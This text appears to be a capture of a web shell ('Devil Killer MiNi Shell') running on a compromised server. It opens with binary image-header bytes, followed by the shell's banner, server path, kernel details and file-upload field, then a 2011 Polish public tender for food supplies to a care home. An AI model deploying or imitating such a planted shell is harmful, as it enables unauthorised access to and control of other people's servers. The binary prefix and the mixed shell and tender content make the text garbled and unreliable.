JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110111/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110111/11777-N-2011.html

<p class="kh_header"><b>Osielsko: Dostawa artykułów spożywczych z podziałem na części od I-VI w okresie od dnia 01.02.2011 r.  do 29.02.2012 r.</b><br>
<b>Numer ogłoszenia: 11777 - 2011; data zamieszczenia: 11.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Bożenkowie , ul. Nadrzeczna 1, 86-021 Osielsko, woj. kujawsko-pomorskie, tel. 0-52 3818716 w. 34, faks 0-52 3818716 w. 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.bydgoski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na części od I-VI w okresie od dnia 01.02.2011 r.  do 29.02.2012 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na części dla grup towarowych obejmujących
KODY CPV - artykuły z grup:  
03142500-3; 15100000-9 ;15200000-0; 15221000-3;15331170-9, 15332100-5, 15500000-3; 15613380-5; 15800000-6; 15811000-6; 15982100-6.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.22.10.00-3, 15.33.11.70-9, 15.33.21.00-5, 15.50.00.00-3, 15.61.33.80-5, 15.80.00.00-6, 15.81.10.00-6, 15.98.21.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.02.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy biorący udział w postępowaniu muszą spełnić następujące warunki :       . Posiadać uprawnienia do wykonywania określonej działalności lub czynności. Na potwierdzenie spełnienia tego warunku należy złożyć następujące dokumenty:                                    
Aktualny odpis właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed terminem upływu składania ofert.
2. Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert o udzielenie zamówienia.
3.Aktualne  zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; Decyzję Inspekcji Sanitarnej dopuszczającej środki transportu do przewożenia produktów spożywczych. Warunki będą oceniane według kryterium spełnia lub nie   spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: Poosiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia i przedstawią Wykaz  wykonanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat  minimum 5 dostaw o podobnym charakterze przed upływem terminu składania ofert z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie. Warunki będą oceniane według kryterium spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: )dysponują lub będą dysponowali potencjałem technicznym( odpowiednim sprzętem) lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego gwarantującego należyte wykonanie zamówienia.  Warunki będą oceniane według kryterium spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: dysponują lub będą dysponować osobami, które będą uczestniczyć w wykonywaniu dostaw. Warunki będą oceniane według kryterium spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O u dzielenie zamówienia mogą ubiegać się wykonawcy, którzy: Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Warunki będą oceniane według kryterium spełnia lub nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. Zamawiający dopuszcza możliwość zmiany cen, nie częściej niż raz na 3 m-ce, na pisemny   wniosek Wykonawcy o wskaźnik wzrostu cen towarów i usług konsumpcyjnych dotyczący okresu ostatnich 3 m-cy publikowany na stronie internetowej Głównego Urzędu Statystycznego  (www.stat.gov.pl).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.bydgoski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Bożenkowie, ul. Nadrzeczna 1, 86-031 Osielsko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2011 godzina 12:00, miejsce: Dom Pomocy Społecznej w Bożenkowie, ul. Nadrzeczna 1, 86-031 Osielsko
w pok. Księgowość - Kasa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb krojony (500g) zwykły
	8.000	Szt
2	Chleb słonecznikowy krojony 	1100	Szt
3	Chleb graham krojony	1100	Szt
4	Chleb tostowy krojony 	1500	Szt
5	Bułka kajzerka 0,05 kg	8000	Szt
6	Bułka tarta luz	100	Kg
7	Sernik	20	Kg
8	Babka piaskowa	20	Kg
9	Babka piaskowa w czekoladzie	20	Kg
10	Pączki z marmoladą	420	Szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> mrożone artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Brokuł	130 kg
2	Fasolka szparagowa zielona	240 kg 
3	Groszek ziel. Mroż.	90 kg 
4	Kalafior	150 kg
5	Pierogi z serem	280 kg  
6	Pierogi z kapustą i grzybami 	15 kg
7	Mieszanka warzywna 7 skł.	200 kg
8	Mieszanka warzywna 9 skł z papryką	70 kg 
9	Szpinak	140 kg
10	Włoszczyzna mroż.	240 kg
11	Wiśnie mroż. 	60 kg
12	Filet rybny morszczuk mroż.	295 kg
13	Śledź solony filet typu matias	200 kg
14	Makrela wędzona 	50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3, 15.33.11.70-9, 15.33.21.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> jaja kurze świeże o gramaturze 50 g.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jaja świeże 50g	17 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> artykuły spożywcze sypkie, koncentraty, przyprawy i desery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ananas w syropie 400 g	160 szt
2.	Barszcz czerwony	18 kg
3.	Bazylia przyprawa 20g	60 szt
4.	Biszkopty 250g	100 szt
5.	Brzoskwinie w syropie 850 g	190 szt
6.	Budyń op .1 kg	135 kg
7.	Buraki konserwowe 0,9 L 	120 szt
8.	Chrzan 0,9 l	20 szt
9.	Chrzan 180 g	90 szt
10.	Ciastka bez dodatku cukru dla diabetyków             cena za 1 kg	90 kg
11.	Cukier  op. 1 kg	2100 kg
12.	Cukier puder op. 500 g cena za 1 kg	    40 kg
13.	Cynamon 20g	  140 szt
14.	Czekolada 100g	   210 szt
15.	Czekolada bez cukru	9 szt

  16.	Czosnek 30g  granulowany 	      20 szt
   17.	Delikat do drobiu 	         2 kg
   18.	Dżem  300 g	     170 szt
19.	Dżem op.  1 kg	     160 szt
20.	Fasola kons. czerw.400 g	       65 szt
21.	Fasola biała sucha luz	       80 kg
22.	Galaretka 100 g	     160 szt
23.	Groch cały luz	       20 kg
24. 	Groch łuskany luz	       20 kg
25.	Groszek konserwowy 400 g	    300 szt
26.	Herbata gran. 100 g 	     650 szt
27.	Jabłka prażone 0,9 l	      135 szt
28.	Jarzynka 1 kg	      170 kg
29.	Kakao 100 g	    120 szt
30.	Kakao 200 g	     35 szt
31.	Kasza jęczmienna	   180 kg
32.	Kasza manna	   150 kg
33.	Kawa inka 150g	   460 szt
34.	Ketchup 500 g	   160 szt
35.	Kisiel 1000 g	    40 kg
36.	Kleik ryżowy 170 g	    125 szt  

37.	Krem typu GELWE	20 szt
38.	Koncentrat  pomidorowy 30% o konsystencji pasty 1000 g 	    190 szt
39.	Koncentrat 30% o konsystencji pasty pomidorowy 200 g	    150 szt
40.	Koperek suszony             10 g	     110 szt
41.	Krem czekol. 400 g na kanapki	     280 szt
42.	Kukurydza kons. 400 g	     350 szt
43.	Liść laurowy 6g	     255 szt
44.	Majeranek 20g	     270 szt
45.	Majonez  cena za 1 kg	     290 kg
46.	Makaron różne rodzaje op. 1 kg	     700 kg
47.	Makrela w sosie pomid. 240 g puszka	     350 szt
48.	Marmolada          500 g	     85 szt
49.	Marmolada 1000 g 	     170 szt
50.	Masa makowa 850 g	2 szt
51.	Mąka pszenna typ 500	     820 kg
52.	Mąka ziemniaczana	       30 kg
53.	Mikołaj z czekolady średni	     70 szt
54.	Miód sztuczny płynny 400 g	     470 szt
55.	Musztarda op. 1 kg	      95 kg
56.	Ocet 0,5 l	     65 szt
57.	Ogórki kons. 0,9 l	   420 szt

58.	Ogórki kiszone 0,9 l	     350 szt
59.	Olej roślinny 1l	     552 szt
60.	Papryka kons. 0,9 l	     235 szt
61.  	Paprykarz szczeciński  240 g	     365 szt
62.	Pieczarki marynowane 300g	     104 szt
63.	Pieczarki marynowane 800 g	       280 szt
64.	Pieprz czarny mielony 20g	     400 szt
65.	Pietruszka suszona 7g	     185 szt
66.	Powidła 300 g	     285 szt
67. 	Powidła 1000 g	     120 szt
68.	Przyprawa do gulaszu   op. 1 kg	      12 kg
69. 	Płatki kukurydziane	       50 szt
70.	Płatki owsiane	  135 kg  
71.	Proszek do pieczenia 	       120 szt
72.	Przecier ogórkowy 900g	     100 szt
73.	Przyprawa do drobiu op. 1 kg	      25 kg
74.	Przyprawa do mięsa   mielonego op.1 kg	     10 kg
75.	Przyprawa do ryb op.             1 kg 	      3  kg
76.	Przyprawa w płynie maggi 1l	     65 szt
77.	Ryż 1 kg	      440 kg
78.	Sałatka szwedzka 0,9 kg	350 szt
79.	Sałatka grecka 0,9 kg	120 szt
80.	Sałatka warzywna 0,9kg	20 szt
81.	Seler konserwowy 1,6 kg	      35 szt
82.	Seler konserwowy 320 g	50 szt
83.	Soda oczyszcz. 60g	       100 szt
84.	Sok bez zaw. cukru 1l karton dla diabetyków	     260 szt
85.	Sok do rozcieńczania op  5 litrowe	     190 szt
86.	Sos boloński słoik 425g	       70 szt
87.	Sos słodko-kwaśny słoik 425 g	25 szt
88.	Sos sałatkowy typu knorr 9g	     100 szt
89.	Sól op.1 kg	     300 kg
90.	Sucharki 250g	     70 szt
91.	Sucharki 250g bez cukru	35 szt
92.	Szczaw  kons 900 ml	  90 szt
93.	Śmietana śnieżka na mleko 	200 szt 
94.	Śliwka suszona 200 g	15 szt
95.	Tuńczyk w s/wł kawałki puszki1,7kg	    17 szt
96.	Tuńczyk w s/wł kawałki pusz.170 g	   280 szt
97.	Wafle w czekoladzie typu Grzeski	  144 szt
98.	Zając czekoladowy średni	   70 szt
99.	Ziele angielskie 20g	   360 szt
100.	Zupa pieczarkowa opak.1 kg	     60 kg
101.	Żurek op 1 kg	50 kg
102.	Żelatyna 50g	             6 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.61.33.80-5, 15.80.00.00-6, 15.98.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> mięso świeże, wędliny i drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WĘDLINY	
1	Biała surowa	100.00
2	Blok sopocki 	140.00
3	Boczek wędzony surowy	150.00
4	Boczek wędzony parzony	 50.00
5	Baleron gotowany	150.00
6	Fantazja z warzyw.	  12.00
7	Kaszanka wieprz.	  75.00
8	Łopatka prasowana	  50.00
9	Metka drob.	  30.00
10	Metka wieprz.	  30.00
11	Mielonka wieprz. prasowana	260.00
12	Mortadela wieprz.	110.00
13	Parówki grube wieprz.	150.00
14	Parówki cienkie wieprz.	150.00
15	Pasztet z pieca	    9.00
16	Pasztet mazowiecki	  13.00
17	Pasztetowa drob.	  60.00
18	Pasztetowa wieprz.	  60.00
19	Pieczeń chlebowa 	  75.00
20	Pieczeń myśliwska	  10.00
21	Pieczeń węgierska	  26.00
22	Pieczeń ze śliwką	    9.00
23	Pierś z indyka - szynka	    6,50
24	Polędwica z indyka	100.00
25	Polędwica sopocka	  38.00
26	Salceson czarny	  35.00
27	Salceson biały	  35.00
28	Szynka dębicka	220.00
29	Szynka konserwowa	  60.00
30	Szynka drobiowa	  70.00
